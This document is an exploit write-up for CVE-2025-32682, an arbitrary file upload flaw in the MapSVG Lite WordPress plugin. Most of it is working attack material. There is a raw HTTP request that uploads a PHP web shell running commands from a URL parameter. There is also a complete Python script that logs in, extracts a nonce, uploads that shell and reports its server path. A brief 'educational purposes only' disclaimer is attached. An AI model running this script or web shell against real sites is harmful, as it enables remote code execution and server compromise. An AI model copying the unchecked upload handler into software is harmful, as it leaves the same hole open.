# 🐚 CVE-2025-32682 - Arbitrary File Upload in MapSVG Lite <= 8.5.34

## 📌 Plugin Details
- **Name:** MapSVG Lite
- **Affected Version:** <= 8.5.34
- **Vulnerability Type:** Arbitrary File Upload
- **CVE ID:** CVE-2025-32682
- **Published Date:** 15 April, 2025
- **CVSS Score:** 9.9 (Critical)

---

## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:

```
/wp-json/mapsvg/v1/svgfile
```

This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).

---

## 📎 Proof of Concept (POC) - Raw HTTP Request
```http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1

Host: 192.168.100.74:888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config

X-WP-Nonce: 4febb3ff50

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807

Content-Length: 298

Origin: http://192.168.100.74:888

Connection: keep-alive

Cookie:


-----------------------------155355665422604566641836454807

Content-Disposition: form-data; name="file"; filename="nxploit.php"

Content-Type: text/xml



<!--?php  
if(isset($_GET['cmd'])) {  
    system($_GET['cmd']);  
}  
?-->  

-----------------------------155355665422604566641836454807--


```

### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
```php
public function uploadSVG() {
    $file = $_FILES['file'];
    $upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
    return new \WP_REST_Response(["file" => $upload], 200);
}
```
- ❌ **No filetype check**
- ❌ **No extension validation**
- ❌ **No sanitization of file contents**

This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.

---

## 🧠 Exploitation Requirements
- ✅ Requires authentication (Subscriber+)
- 🛑 No filetype or content validation

---

## 🐍 POC 2 - Python Exploit Script
```python
# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()

login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})

if 'wordpress_logged_in' not in str(session.cookies):
    print("[-] Login failed")
    exit()
print("[+] Logged in successfully.")

nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
    print("[-] Failed to extract nonce")
    exit()
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")

upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")

payload = {'file': ('nxploit.php', '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>', 'application/x-php')}
headers = {
    'X-WP-Nonce': nonce,
    'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent
}

res = session.post(upload_url, files=payload, headers=headers)

try:
    json_res = res.json()
    print("[+] Server response (formatted):")
    print("File Name    :", json_res['file']['name'])
    print("URL          :", json_res['file']['relativeUrl'])
    print("Path Short   :", json_res['file']['pathShort'])
    print("Server Path  :", json_res['file']['serverPath'])
    print("\nExploited By : Nxploited | Khaled Alenazi")
except:
    print("[-] Upload failed or invalid response.")
```

---

## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.

---

## 👤  By:

**Nxploited | Khaled Alenazi**

---

## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.
